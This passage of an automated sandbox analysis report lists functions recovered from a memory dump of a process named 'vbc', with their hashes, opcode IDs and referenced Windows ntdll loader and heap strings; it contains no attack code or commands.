                            • Instruction Fuzzy Hash: D73235B16193419FD320CF68C484B6BFBE5BF88344F04492DF59A87292D7B5D988CB52
                            Function 05170770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                            • API String ID: 0-4253913091
                            • Opcode ID: 8549d868ef4e82ec376567eb347c981105e3f9bf01c13a2de75bb5fb9242adf2
                            • Instruction ID: b28010483abf5bedec661b4a4aca6eedd20df5cf2ffcde0a598e432a45484442
                            • Opcode Fuzzy Hash: 8549d868ef4e82ec376567eb347c981105e3f9bf01c13a2de75bb5fb9242adf2
                            • Instruction Fuzzy Hash: A5F17B70B00609DFDB29CF68C898F6ABBB6FF48304F1541A8E4569B391D731A981CF90
                            Function 05161460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                            Download Yara Rule
                            Strings
                            • HEAP[%wZ]: , xrefs: 05161712
                            • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 05161728
                            • HEAP: , xrefs: 05161596
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                            • API String ID: 0-3178619729
                            • Opcode ID: bbc5d9b6c7d2ece0af3f8fccf8907a566ad6dbf9e9b682897b8ab51ebe140150
                            • Instruction ID: bd4e7472e57929c88691b18db0d578c09803a77d0c473645f917a86263d05c19
                            • Opcode Fuzzy Hash: bbc5d9b6c7d2ece0af3f8fccf8907a566ad6dbf9e9b682897b8ab51ebe140150
                            • Instruction Fuzzy Hash: 40E10175A04245AFDB29CF28C895BBABBF2FF49300F14845DE896CB286D774E851CB50
                            Function 0516B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                            • API String ID: 0-1145731471
                            • Opcode ID: 7145bba382ee5f48b348b69916a38e72d96d35258ec63e75f070d5e1e8d475c2
                            • Instruction ID: 24e6c4941b16cfd93cdedbe52cd464f4264705e928f6760a51a9a8ffb26e8a5d
                            • Opcode Fuzzy Hash: 7145bba382ee5f48b348b69916a38e72d96d35258ec63e75f070d5e1e8d475c2
                            • Instruction Fuzzy Hash: 70B1F331A086449FCB29DF68C980FADBBB6BF54304F15896DE822EB384D731E841CB00
                            Function 051E368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                            • API String ID: 0-2391371766
                            • Opcode ID: 4933a30b0c753fde60decfbbd32c2f702dc8a1b097fd8c290df5a22dcaca0cfd
                            • Instruction ID: 1f513ebde24683f40a565d826536836b54d8d907795125c6c3418817714453dd
                            • Opcode Fuzzy Hash: 4933a30b0c753fde60decfbbd32c2f702dc8a1b097fd8c290df5a22dcaca0cfd
                            • Instruction Fuzzy Hash: 27B1AF76618B41AFE321DE54C889F6BB7E8BB84710F410D29FA61DB280D775F844CB92
                            Function 0515A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: FilterFullPath$UseFilter$\??\
                            • API String ID: 0-2779062949
                            • Opcode ID: dd0033d0e8475cd43cb5c1ec5ad105af672ce2ed7c8f235f5c10c623eaafa85d
                            • Instruction ID: 4d6c3bc1256a4ee7e068ee582b7f63ce1471e0c4ef831fff069b47ce7acf2dc3
                            • Opcode Fuzzy Hash: dd0033d0e8475cd43cb5c1ec5ad105af672ce2ed7c8f235f5c10c623eaafa85d
                            • Instruction Fuzzy Hash: 03A17B769112299BDB31DF24CC88BEAB7B8FF44714F1001EAE909A7250D7759E84CF90
                            Function 051F36EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                            • API String ID: 0-318774311
                            • Opcode ID: d55859ec2cc82f845532a8951de466c60413b2e3ac07a2990b80b2f6245c7342
                            • Instruction ID: 44a23cceb47ba4d72ab59d51b1ff6cc57ac8ede3709564ad0ed81f561bdfd76e
                            • Opcode Fuzzy Hash: d55859ec2cc82f845532a8951de466c60413b2e3ac07a2990b80b2f6245c7342
                            • Instruction Fuzzy Hash: FF8179B5608340AFE325DB24C884F6AB7E9FF84750F040E29FAA59B391D774D904CB62
                            Function 0516B440 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                            • API String ID: 0-373624363
                            • Opcode ID: 1fdafe3ebe83458935fb74a273829d7fdd45eee6b7aa70e39866e6594596c818
                            • Instruction ID: 737c96fee9add9889a27a63caf13cffdc311aca864be246982aecef6adc4e4f1
                            • Opcode Fuzzy Hash: 1fdafe3ebe83458935fb74a273829d7fdd45eee6b7aa70e39866e6594596c818
                            • Instruction Fuzzy Hash: 5E91FF72A08319CFDB25CF58C540BEEB7B1FF01324F158599E862EB290D3799A91CB91
                            Function 0519909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: %$&$@
                            • API String ID: 0-1537733988
                            • Opcode ID: c214422b9c677f38caeacb5662ac10fed1d776e3d5cb2f1c79b2a0b76b9c796c
                            • Instruction ID: 4563ce49fbc6be31997a4c8aad15b7ad1834bd749f658031e411aea29e25f5ff
                            • Opcode Fuzzy Hash: c214422b9c677f38caeacb5662ac10fed1d776e3d5cb2f1c79b2a0b76b9c796c
                            • Instruction Fuzzy Hash: B171B27060D3459FDB28DF24C584A6BFBEAFF88618F10491DF49A47291D731E905CB92
                            Function 0523B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                            Download Yara Rule
                            Strings
                            • TargetNtPath, xrefs: 0523B82F
                            • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0523B82A
                            • GlobalizationUserSettings, xrefs: 0523B834
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                            • API String ID: 0-505981995
                            • Opcode ID: 38b4e14fcc79034341715dea26bf2256a6ea097522113721880be0b7fd584837
                            • Instruction ID: 2ee4b70e63764c3b26a118c3c1b76ecae0da6bdc10d63a40196de43c82bbf68b
                            • Opcode Fuzzy Hash: 38b4e14fcc79034341715dea26bf2256a6ea097522113721880be0b7fd584837
                            • Instruction Fuzzy Hash: 24617FB2951229ABDB31DF54DC89BEAB7B9FF04710F0105E9A509AB250DB749E80CF90
                            Function 0515F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                            Download Yara Rule
                            Strings
                            • HEAP[%wZ]: , xrefs: 051BE6A6
                            • HEAP: , xrefs: 051BE6B3
                            • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 051BE6C6
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                            • API String ID: 0-1340214556
                            • Opcode ID: 0612f789d8bc42828a453d9b23449c264baaafe93702152e4e060ed37dfa710b
                            • Instruction ID: 478d2bce5283c57180ecd0f584c47a50eab5cf1f02e82fcc79e3966468357938
                            • Opcode Fuzzy Hash: 0612f789d8bc42828a453d9b23449c264baaafe93702152e4e060ed37dfa710b
                            • Instruction Fuzzy Hash: A9511575304644EFE722DB68C988FEABBF9FF05710F0401A4E9618B292D374EA41CB50
                            Function 051815F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                            Download Yara Rule
                            Strings
                            • minkernel\ntdll\ldrmap.c, xrefs: 051CA59A
                            • LdrpCompleteMapModule, xrefs: 051CA590
                            • Could not validate the crypto signature for DLL %wZ, xrefs: 051CA589
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                            • API String ID: 0-1676968949
                            • Opcode ID: d012ef08415efcd0def9dcbff87c6c1731a278618238bc881fdc7282e2d38b35
                            • Instruction ID: 6ed2fda4601e7c8f73520620af4e75452e5744e7fcce386117f04f8a91269343
                            • Opcode Fuzzy Hash: d012ef08415efcd0def9dcbff87c6c1731a278618238bc881fdc7282e2d38b35
                            • Instruction Fuzzy Hash: BB515771704748ABD736EB18C948B757BE5BF00714F290598F9929B2D2D7B0E942CB40
                            Function 0519C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                            Download Yara Rule
                            Strings
                            • minkernel\ntdll\ldrinit.c, xrefs: 051D82E8
                            • Failed to reallocate the system dirs string !, xrefs: 051D82D7
                            • LdrpInitializePerUserWindowsDirectory, xrefs: 051D82DE
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-1783798831
                            • Opcode ID: 277b5946c20138bf58ea90d13d0d5eda43b46449e3015b1116aff81dc30ee1c7
                            • Instruction ID: 69b59565acf33402c295554e91ca7e1e240204c335c829aeb5903a2dd84bff3d
                            • Opcode Fuzzy Hash: 277b5946c20138bf58ea90d13d0d5eda43b46449e3015b1116aff81dc30ee1c7
                            • Instruction Fuzzy Hash: 43412875654304EBCB24EB24EC49F6BBBE8FF44650F40492AF945D3291EB74E800CB91
                            Function 0515758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                            • API String ID: 0-1151232445
                            • Opcode ID: c112cfa830abe2a9b181eb53ec2546bca9db270f345b4c90bb1f4a5f8e697eeb
                            • Instruction ID: b3a0e3a0fffc1428db5947f24c440493d4d0ff7a2513cd96aa1ff7272ce7930e
                            • Opcode Fuzzy Hash: c112cfa830abe2a9b181eb53ec2546bca9db270f345b4c90bb1f4a5f8e697eeb
                            • Instruction Fuzzy Hash: 6541D170204250CFFF39DA1DC096BF9B7A2EF012A4F18446DD8568B286D7B8D889C751
                            Function 051916CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                            Download Yara Rule
                            Strings
                            • minkernel\ntdll\ldrtls.c, xrefs: 051D1B4A
                            • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 051D1B39
                            • LdrpAllocateTls, xrefs: 051D1B40
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                            • API String ID: 0-4274184382
                            • Opcode ID: 3dd37dad31b59441935e4448125a24acba71b4444a863d3c1b411c8e7df33217
                            • Instruction ID: f8195002b5583ff483bc052f5fbcd225338306d3fc365d9464f86afb8e44af51
                            • Opcode Fuzzy Hash: 3dd37dad31b59441935e4448125a24acba71b4444a863d3c1b411c8e7df33217
                            • Instruction Fuzzy Hash: 1341AD76E40609AFDB19DFA8D845BAEFBF6FF48704F144519E406A7241DB74A840CBA0
                            Function 0521C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                            Download Yara Rule
                            Strings
                            • @, xrefs: 0521C1F1
                            • PreferredUILanguages, xrefs: 0521C212
                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0521C1C5
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                            • API String ID: 0-2968386058
                            • Opcode ID: fed9241874a0313a73f3da4ea5552208601bb591b7c31fcfbf3f50cef3aa2aca
                            • Instruction ID: bf721daf5ecd1df56bbd9f5588adcb5e39d3a25e6c8a4a5f1cce6f0e9badea60
                            • Opcode Fuzzy Hash: fed9241874a0313a73f3da4ea5552208601bb591b7c31fcfbf3f50cef3aa2aca
                            • Instruction Fuzzy Hash: 81417176A5020AEBDF21DAE4C885FEFB7F9BF14710F10406AE915BB240D7B49E448B54
                            Function 051E4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                            Download Yara Rule
                            Strings
                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 051E4888
                            • minkernel\ntdll\ldrredirect.c, xrefs: 051E4899
                            • LdrpCheckRedirection, xrefs: 051E488F
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                            • API String ID: 0-3154609507
                            • Opcode ID: b5ac26cbbe070fd16320c57f7c8bdfaead58e6fc123c830486bc3dbafd02fe05
                            • Instruction ID: cdfb6a9b11aa666a8a73f7eeca635882fe6d8535fc908e860f116b91ce33dfd1
                            • Opcode Fuzzy Hash: b5ac26cbbe070fd16320c57f7c8bdfaead58e6fc123c830486bc3dbafd02fe05
                            • Instruction Fuzzy Hash: 5641AF32A14B509BCF21DFA8D844E26BBE6FF89A50F06065DED8997251D7B0E800CBD1
                            Function 051F4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                            • API String ID: 0-1373925480
                            • Opcode ID: c27f21e305d565a382b9645146bfe2f5ba736b0649e2a00824247afc2989e0c8
                            • Instruction ID: c1158766ee53799fbee959726c516a3f183e4a7f2520139633cde1e31a4f2358
                            • Opcode Fuzzy Hash: c27f21e305d565a382b9645146bfe2f5ba736b0649e2a00824247afc2989e0c8
                            • Instruction Fuzzy Hash: 5D414932A08798CBEF25DBE8D844BAEB7B5FF45350F14046ADA02EB781D7B49901CB11
                            Function 051EB594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                            Download Yara Rule
                            Strings
                            • @, xrefs: 051EB670
                            • GlobalFlag, xrefs: 051EB68F
                            • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 051EB632
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                            • API String ID: 0-4192008846
                            • Opcode ID: 4ce40c3b598be30180c581b9a3e3d57dc199c25bdc3a4045f616665ffd13b3cc
                            • Instruction ID: a8be7d4e803bb4ac876bd2f409279aa23863aa7fb9c9fbcbeae9a25980bdc21f
                            • Opcode Fuzzy Hash: 4ce40c3b598be30180c581b9a3e3d57dc199c25bdc3a4045f616665ffd13b3cc
                            • Instruction Fuzzy Hash: AF316DB6E00609AFDB11EFA4CC84EEEBBBCEF48744F140469E605A7151D7749E40CBA4
                            Function 05191607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                            Download Yara Rule
                            Strings
                            • minkernel\ntdll\ldrtls.c, xrefs: 051D1A51
                            • DLL "%wZ" has TLS information at %p, xrefs: 051D1A40
                            • LdrpInitializeTls, xrefs: 051D1A47
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                            • API String ID: 0-931879808
                            • Opcode ID: c825757c6f1d3660b6b10d00a4ef680d1957a6d4df10c1ce4c6c30594c982177
                            • Instruction ID: d3a4e4fc07136814d4b19d1efa9a277291c644482e3464498baa98a5ee0cdc5e
                            • Opcode Fuzzy Hash: c825757c6f1d3660b6b10d00a4ef680d1957a6d4df10c1ce4c6c30594c982177
                            • Instruction Fuzzy Hash: 1E31F572F90346BBEB28DB48D88AF6AB67ABF40755F050519F505A7180DBB4BD80C7A0
                            Function 051E20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                            Download Yara Rule
                            Strings
                            • Process initialization failed with status 0x%08lx, xrefs: 051E20F3
                            • LdrpInitializationFailure, xrefs: 051E20FA
                            • minkernel\ntdll\ldrinit.c, xrefs: 051E2104
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-2986994758
                            • Opcode ID: f51b7013eca085ebb1325696a6ca60bdab07381b7a2f31bd6416341cd75bdf5b
                            • Instruction ID: 7ac7a6238900f462b4c053114f93a03eb46b5c0f9dc0bb15803a2a18968f6160
                            • Opcode Fuzzy Hash: f51b7013eca085ebb1325696a6ca60bdab07381b7a2f31bd6416341cd75bdf5b
                            • Instruction Fuzzy Hash: 5BF0C8357907087BE714DB48DC5BF9D7BACEB41B94F500055F6117B281D7F0A640CA51
                            Function 051DE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: Legacy$UEFI
                            • API String ID: 2994545307-634100481
                            • Opcode ID: 414102a94de9ea399d41af675748979d64dbcf538937a8815826e2f56d57f10f
                            • Instruction ID: a95dcaba07c8f65e45592d2252eac61aedfaa66e0f2522217fd09062a9a39b2b
                            • Opcode Fuzzy Hash: 414102a94de9ea399d41af675748979d64dbcf538937a8815826e2f56d57f10f
                            • Instruction Fuzzy Hash: 6C616C72E04318AFDB25DFA8C984BAEFBB9FB44701F10416DE549EB291D731A940CB60
                            Function 0517F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: $$$
                            • API String ID: 0-233714265
                            • Opcode ID: 017985533175b39b152e683b01fadd5befe5fca7ac4f0576248167f19528a16b
                            • Instruction ID: 9becd22b673524c781ad4ff7f3042ce9570c5280cc9324ebedae92fa7233595c
                            • Opcode Fuzzy Hash: 017985533175b39b152e683b01fadd5befe5fca7ac4f0576248167f19528a16b
                            • Instruction Fuzzy Hash: E661EE71B0474DDFDB20EFA8C588BAEBBB2FF04304F144469E5156B281DB74A982CB90
                            Function 051604E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                            Download Yara Rule
                            Strings
                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0516063D
                            • kLsE, xrefs: 05160540
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                            • API String ID: 0-2547482624
                            • Opcode ID: 58bd2c26bd54697722147202d9cc437d777794862708518f979453411d75101d
                            • Instruction ID: 04696faa92fdd44263ba2e8177a6efc7e17332a6426413a149809a94d257369d
                            • Opcode Fuzzy Hash: 58bd2c26bd54697722147202d9cc437d777794862708518f979453411d75101d
                            • Instruction Fuzzy Hash: BD51CEB16047429FC724EF29C448AA3B7E5BF88304F00883EE9AA87241E770E555CF92
                            Function 051F35BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                            • API String ID: 0-118005554
                            • Opcode ID: 86586ca4439485940d90dd5f84bd522268f8bfaecee474e7111cb8c328e53b2b
                            • Instruction ID: d8254edca8164ddaad401ce6e6d6a1d6f21778d6661b8e8428a19e94776904a7
                            • Opcode Fuzzy Hash: 86586ca4439485940d90dd5f84bd522268f8bfaecee474e7111cb8c328e53b2b
                            • Instruction Fuzzy Hash: 7731CD3220D7819BD312DB28D858B2AB7E4FF84724F050C69FA658B391EB74DA05CB52
                            Function 051934B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                            Download Yara Rule
                            Strings
                            • RtlpInitializeAssemblyStorageMap, xrefs: 051D2A90
                            • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 051D2A95
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                            • API String ID: 0-2653619699
                            • Opcode ID: 01d3fa7305db889b87a427f8dd7ecec240dd24713743a2f8c2472c1cf073130c
                            • Instruction ID: a75c0d6a1173b86fb574521908eaf3dd80225b195e72dd4a362bebcd682b64fc
                            • Opcode Fuzzy Hash: 01d3fa7305db889b87a427f8dd7ecec240dd24713743a2f8c2472c1cf073130c
                            • Instruction Fuzzy Hash: F2114075704204BBEB3DCA488D45F6FB6AAEB94B54F1A84297925DF280D7B8CD0086A0
                            Function 0519A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: Cleanup Group$Threadpool!
                            • API String ID: 2994545307-4008356553
                            • Opcode ID: 979454ef93048d12079ac0d901d19c426b8727b3c2222f1a2d95ca23511de3d7
                            • Instruction ID: 642dce0dd6ff20935e9fa1b93f43f1e78abd28e77b5c2620327a9f5acc39de0c
                            • Opcode Fuzzy Hash: 979454ef93048d12079ac0d901d19c426b8727b3c2222f1a2d95ca23511de3d7
                            • Instruction Fuzzy Hash: A90128B2254784AFD311DF14CD4AF167BE9EB44B16F018939B658C7590E734E808CB46
                            Function 0516C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID: MUI
                            • API String ID: 0-1339004836
                            • Opcode ID: 4cf5b7aa5632528233c8fe7a44df01522be2c1350932efd89e4c2b3b5dd1741a
                            • Instruction ID: 269776b7af52f77bff0cdcb0264eb3c04301ebe6ff3e9b413a397b82d00f5879
                            • Opcode Fuzzy Hash: 4cf5b7aa5632528233c8fe7a44df01522be2c1350932efd89e4c2b3b5dd1741a
                            • Instruction Fuzzy Hash: AA826A75E042589FDB24CFA9D884BEDB7B2BF48314F14816AE85AAB350D7309D91CF90
                            Function 0519F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2a5da7217020790c8fc933b99db2b838e42f1db2cebbbcc1cd4cfe91810bc201
                            • Instruction ID: ea31b0899fc0ace690898583931d720deed28eb883d02b7cf533242fd73d517a
                            • Opcode Fuzzy Hash: 2a5da7217020790c8fc933b99db2b838e42f1db2cebbbcc1cd4cfe91810bc201
                            • Instruction Fuzzy Hash: E34137B5910388AECB26CFA9D484AADBBF4BF48340F50456EE459E7211DB30A945CB60
                            Function 0519A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
